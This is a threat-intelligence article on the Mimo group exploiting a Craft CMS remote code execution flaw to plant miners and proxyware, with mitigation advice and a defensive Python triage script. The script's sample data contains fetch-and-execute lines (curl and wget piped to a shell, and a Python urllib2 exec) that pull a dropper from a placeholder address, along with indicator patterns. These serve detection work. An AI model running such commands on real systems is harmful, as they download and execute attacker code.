
Mimo Threat Actor Exploits Craft CMS Vulnerability to Deploy Miners and Proxyware

Cybersecurity researchers have identified a new campaign launched by the financially motivated threat actor Mimo, which exploits a critical vulnerability in Craft Content Management System (CMS) to deploy multiple malicious payloads. The goal: to hijack system resources for cryptocurrency mining and residential proxyware monetization, commonly referred to as cryptojacking and proxyjacking.

The flaw in question, CVE-2025-32432, is a maximum-severity (CVSS 10.0) remote code execution (RCE) vulnerability disclosed in early 2025 and patched in Craft CMS versions 3.9.15, 4.14.15, and 5.6.17. It was first reported by Orange Cyberdefense SensePost, which observed in-the-wild exploitation as early as February 2025, before fixed releases were available.

Attack Chain and Payloads

Step 1: Exploiting the Craft CMS Vulnerability

The attackers exploit CVE-2025-32432 to execute code on exposed Craft CMS instances without authentication. Once in, they drop a web shell so that their access no longer depends on the original bug, then use it to download and execute a malicious shell script named 4l4md4r.sh.

Step 2: Shell Script Execution

The script is fetched from a remote server using curl, wget, or the Python urllib2 library. Note that urllib2 exists only in Python 2, so that branch can succeed only on hosts that still ship a Python 2 interpreter.

Notably, the attacker imports the library under the alias fbi, apparently a nod to the U.S. Federal Bureau of Investigation. No legitimate script has a reason to use that alias, which makes the string a cheap and specific indicator for threat hunting and for retrospective forensic review of shell histories and process command lines.

“This naming convention could serve as a useful indicator for detection, especially in retroactive analysis of suspicious Python activity,” said Sekoia researchers Jeremy Scion and Pierre Le Bourhis.

Step 3: System Hygiene and Competition Removal

Before deploying additional malware, the script:

  • Checks for prior infections

  • Uninstalls known cryptocurrency miners

  • Terminates active instances of XMRig or similar mining tools

This behavior ensures that Mimo’s payloads have exclusive access to system resources.

Step 4: Deploying the Mimo Loader and Payloads

The script then launches an ELF binary named 4l4md4r, which functions as the Mimo Loader. Its primary actions include:

  • Adding a malicious shared object (alamdar.so) to /etc/ld.so.preload, so that the dynamic loader injects it into every dynamically linked process started afterwards

  • Hiding its presence from security tools and administrators

  • Deploying the XMRig miner to generate cryptocurrency

  • Installing IPRoyal proxyware, which sells the victim’s internet bandwidth for profit

Together, these tools enable multifaceted monetization of compromised systems, turning each infected host into a source of both computational power and network bandwidth.

Attribution to Mimo Intrusion Set

The campaign has been attributed to Mimo, a financially motivated threat group that has been active since at least March 2022. In previous campaigns, Mimo exploited several high-profile vulnerabilities, including:

  • CVE-2021-44228 – Apache Log4j

  • CVE-2022-26134 – Atlassian Confluence

  • CVE-2023-27350 – PaperCut

  • CVE-2023-46604 – Apache ActiveMQ

Mimo’s operations were also linked to ransomware activity in 2023, involving a Go-based ransomware variant called Mimus, derived from the open-source project MauriCrypt, according to AhnLab.

Threat Actor Origins and Infrastructure

Sekoia observed exploitation attempts originating from a Turkish IP address (85.106.113[.]168), and open-source intelligence (OSINT) points to an operator based in Turkey, although attribution remains tentative.

“Mimo remains active and operational, continuing to exploit newly disclosed vulnerabilities,” Sekoia stated. “The short timeframe between the public disclosure of CVE-2025-32432 and its exploitation reflects a high level of responsiveness and technical agility.”

Key Takeaways and Mitigation

Why It Matters:

This campaign demonstrates the real-world risk of delayed patching, especially for publicly accessible applications like CMS platforms.

Recommended Actions:

  • Update Craft CMS to a patched release (3.9.15, 4.14.15, or 5.6.17 or later for its major line). Patching closes the entry point but does not remove a web shell that was already dropped, so review the web root of any instance that was exposed before the update for unfamiliar PHP files

  • Monitor for unusual system modifications (e.g., any change to /etc/ld.so.preload, which is normally absent or empty on a clean host)

  • Scan for known indicators like:

    • Known file names: the dropper script 4l4md4r.sh, the 4l4md4r ELF loader, and the alamdar.so shared object

    • The Python alias import urllib2 as fbi in shell histories and process command lines

  • Use endpoint monitoring to detect miner or proxyware installations (XMRig processes, IPRoyal clients, sustained CPU saturation, connections to mining pools)

  • Audit for unauthorized downloads or unexpected outbound network traffic
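As an added example (not code from Sekoia, Cyber Syrup, or the campaign itself), the triage script below runs the checks listed above over constructed host artifacts: a sample /etc/ld.so.preload, sample ps output containing the 4l4md4r loader, an XMRig process and the urllib2-as-fbi Python one-liner from Step 2, and a sample shell history. It also checks a Craft CMS version string against the fixed releases named in this article. The sample data and the 203.0.113.5 address are constructed; the iproyal/pawns process-name pattern and the severity labels are assumptions, not indicators from the report. Passing --live gathers the same three artifacts from the Linux host the script runs on instead of using the samples.

```python
"""Offline host triage for the Mimo indicators described in this article.
Added example, not Sekoia's tooling or the campaign's code. SAMPLE_* strings
are constructed stand-ins for /etc/ld.so.preload, `ps -eo pid,comm,args`
output and a shell history; 203.0.113.5 is a documentation address."""
import os
import re
import subprocess
import sys

# --- constructed sample artifacts (not real captures) ----------------------
SAMPLE_LD_PRELOAD = "/usr/local/lib/alamdar.so\n"

SAMPLE_PS = """\
  PID COMMAND         ARGS
    1 systemd         /sbin/init
 1337 4l4md4r         /tmp/4l4md4r
 1402 xmrig           /tmp/.x/xmrig -o 203.0.113.5:3333 -u 4AAAA...
 1510 python          python -c import urllib2 as fbi;exec(fbi.urlopen('http://203.0.113.5/4l4md4r.sh').read())
 1600 php-fpm         php-fpm: pool www
"""

SAMPLE_HISTORY = """\
cd /var/www/html
curl -fsSL http://203.0.113.5/4l4md4r.sh | sh
wget -q -O- http://203.0.113.5/4l4md4r.sh | bash
ls -la
"""

# Name-based indicators from the article, plus one assumed proxyware name.
INDICATORS = [
    (r"\b4l4md4r(\.sh)?\b", "Mimo loader / dropper script name"),
    (r"\balamdar\.so\b", "Mimo preload library"),
    (r"import\s+urllib2\s+as\s+fbi", "urllib2 aliased as fbi"),
    (r"\bxmrig\b", "XMRig miner"),
    (r"\biproyal\b|\bpawns\b", "IPRoyal proxyware client (name assumed)"),
]

# Fixed releases per Craft CMS major line, from the advisory cited above.
FIXED_VERSIONS = {3: (3, 9, 15), 4: (4, 14, 15), 5: (5, 6, 17)}


def check_ld_preload(content):
    """Flag every entry: on a clean host /etc/ld.so.preload is normally absent
    or empty, so any path deserves a look. Entries are whitespace-separated."""
    findings = []
    for path in content.replace(":", " ").split():
        severity = "high" if path.endswith("alamdar.so") else "medium"
        findings.append((severity, "ld.so.preload", path))
    return findings


def scan_text(source, text):
    """One finding per matching pattern per line, so one command can yield
    several (e.g. the fbi alias plus the 4l4md4r.sh URL it fetches)."""
    findings = []
    for line in text.splitlines():
        for pattern, label in INDICATORS:
            if re.search(pattern, line, re.IGNORECASE):
                findings.append(("high", source, f"{label}: {line.strip()}"))
    return findings


def check_processes(ps_output):
    """Scan ps output, skipping the header row."""
    return scan_text("process", "\n".join(ps_output.splitlines()[1:]))


def craft_is_patched(version):
    """True at or above the fixed release for the major line, False below,
    None for a major line the advisory does not cover."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    parts = tuple(int(p) for p in m.groups())
    fixed = FIXED_VERSIONS.get(parts[0])
    return None if fixed is None else parts >= fixed


def triage(ld_preload, ps_output, history):
    """Run all checks; returns a list of (severity, source, detail) tuples."""
    return (check_ld_preload(ld_preload) + check_processes(ps_output)
            + scan_text("history", history))


def read_live():
    """Gather the same three artifacts from the Linux host this runs on."""
    def read(path):
        try:
            with open(path) as fh:
                return fh.read()
        except OSError:  # a missing ld.so.preload is the normal, clean case
            return ""
    ps = subprocess.run(["ps", "-eo", "pid,comm,args"],
                        capture_output=True, text=True).stdout
    return read("/etc/ld.so.preload"), ps, read(os.path.expanduser("~/.bash_history"))


if __name__ == "__main__":
    artifacts = read_live() if "--live" in sys.argv else (
        SAMPLE_LD_PRELOAD, SAMPLE_PS, SAMPLE_HISTORY)
    for severity, source, detail in triage(*artifacts):
        print(f"[{severity:6}] {source:13} {detail}")
```

Findings come back as plain tuples so they can be forwarded to a SIEM or ticketing step. Name-based indicators such as these are brittle, since the actor can rename the script and library at will, so treat the ld.so.preload check (any write to that file, regardless of the name it contains) as the durable signal and the string matches as confirmation.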

Conclusion

The Mimo intrusion set’s rapid weaponization of newly disclosed vulnerabilities illustrates the evolving landscape of financially motivated cyber threats. By combining cryptojacking, proxyjacking, and stealthy persistence techniques, attackers like Mimo are maximizing profits while minimizing visibility—underscoring the critical need for timely patching, threat intelligence sharing, and behavioral monitoring across enterprise environments.